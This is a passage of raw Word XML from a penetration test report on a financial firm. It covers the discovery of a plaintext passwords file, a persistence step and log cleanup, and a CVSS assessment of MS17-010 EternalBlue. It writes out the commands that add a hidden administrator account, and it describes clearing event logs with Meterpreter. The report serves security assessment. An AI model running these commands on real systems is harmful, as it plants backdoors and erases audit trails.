      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>in the file system of the server to look fo</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">r valuable and sensitive files. We </w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">made </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>a major discovery i</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">n the directory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053A1900" w14:textId="6F42E575"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 xml:space="preserve">C:\Users\Administrator\Documents\FTP_HOME\_BBC, </w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">when </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>we discovered a file n</w:t>
      </w:r>
      <w:r w:rsidR="00E55CC7" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>amed password</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785A1170" w14:textId="0003607E" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Figure 9. </w:t>
      </w:r>
      <w:r w:rsidR="00DE2745" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Discovery of passwords.txt in the file directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DDD55E" w14:textId="0ABC6422" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="006131A3" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00221F7C" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00221F7C" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>extremely</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> dangerous practice</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to have a file like this</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Attackers can use these credentials to log in to the FTP server and steal or tamper with more data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794F2BBF" w14:textId="77777777" w:rsidR="00E55CC7" w:rsidRPr="0022306B" w:rsidRDefault="00E55CC7" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF784E3" w14:textId="77777777" w:rsidR="0089073C" w:rsidRPr="0022306B" w:rsidRDefault="0089073C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4E2BDB" w14:textId="1D3CEE94" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="00E55CC7" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.4 Phase Four: Maintain </w:t>
      </w:r>
      <w:r w:rsidR="00DE2745" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF558EE" w14:textId="4836DD30"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To demonstrate how advanced attackers can ensure persistent control, we created a new user account with administrator privileges on the target system</w:t>
      </w:r>
      <w:r w:rsidR="00B24894" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6161A3B6" w14:textId="5B4478E9" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="00B24894">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execute the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D263B1" w14:textId="1CE19FB2" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="00B24894">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>net user pentest P@ssw0rd123!  /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174770B1" w14:textId="77F87A56" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="00B24894">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Administrators pentest /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB05A7" w14:textId="5E9FD18C"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Through this simple operation</w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, we exposed how </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>even if the main vulnerability is fixed and the administrator password is modified, attackers can still log in to the system again through this hidden backdoor account via remote desktop or other means.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D498DB" w14:textId="77777777" w:rsidR="00E55CC7" w:rsidRPr="0022306B" w:rsidRDefault="00E55CC7" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF8E472" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="00773C52" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>.5 Stage Five: Removing Traces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0060CFEC" w14:textId="5D412299" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>After completing all the test tasks, we carried out a strict cleaning procedure to restore th</w:t>
      </w:r>
      <w:r w:rsidR="00E55CC7" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">e system to its original state. </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We deleted the </w:t>
      </w:r>
      <w:r w:rsidR="00F467DB" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:r w:rsidR="00E55CC7" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> user account we created. </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>In the Meterpreter session, the clearev command was used to clear the event logs of the system, security, and applications, erasing o</w:t>
      </w:r>
      <w:r w:rsidR="00E55CC7" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ur login and operation </w:t>
      </w:r>
      <w:r w:rsidR="00F467DB" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">records. </w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensure</w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> that our testing activities d</w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> not leave any security risks for customers or interfere with subsequent system audits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D15306E" w14:textId="77777777" w:rsidR="00E55CC7" w:rsidRPr="0022306B" w:rsidRDefault="00E55CC7" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50EFBF6F" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="00773C52" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="001B69E9" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerability Analysis and CVSS Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188FD487" w14:textId="4D76B88C" w:rsidR="00773C52"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This </w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>section</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>provides</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> a quantitative risk assessment of the </w:t>
      </w:r>
      <w:r w:rsidR="00B24894" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>key vulnerabilities discovered</w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007742B2" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="00D9392E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cobalt Harbor Financials’ endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. We adopt the industry-standard Common Vulnerability Scoring System (CVSS) version v3.0, which provides an objective and standardized method to assess the severity of vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D8F24B" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="00773C52" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="001B69E9" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>.1 Critical Vulnerability: MS17-010 "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001B69E9" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B69E9" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD40A5F" w14:textId="77777777" w:rsidR="00773C52" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Vu</w:t>
      </w:r>
      <w:r w:rsidR="00773C52" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>lnerability Identification (ID):</w:t>
      </w:r>
      <w:r w:rsidR="00773C52" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2017-0144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9EEAA1" w14:textId="5EDF2FEB" w:rsidR="00773C52" w:rsidRPr="0022306B" w:rsidRDefault="006131A3" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidR="00773C52" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00773C52" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>is critical</w:t>
      </w:r>
      <w:r w:rsidR="00773C52" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability exists in the implementation of the Microsoft Server Message Block 1.0 (SMBv1) protocol. Remote attackers can exploit this vulnerability by sending specially crafted malicious data packets to execute arbitrary code on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9BEFBD" w14:textId="77777777"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b/>
        </w:rPr>
        <w:t>CVSS v3.0 score</w:t>
      </w:r>
      <w:r w:rsidR="00773C52" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00773C52" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9.8 (out of 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724909E9" w14:textId="77777777" w:rsidR="00773C52" w:rsidRPr="0022306B" w:rsidRDefault="00773C52" w:rsidP="00773C52">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Severity level: </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770E3131" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>CVSS v3.0 vector string: CVSS: 3.0 / AV: N/AC: L/PR: N/UI: N/S: U/C: H/I: A: H/H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7682273F" w14:textId="77777777" w:rsidR="00773C52" w:rsidRPr="0022306B" w:rsidRDefault="00773C52" w:rsidP="001B69E9">
      <w:pPr>
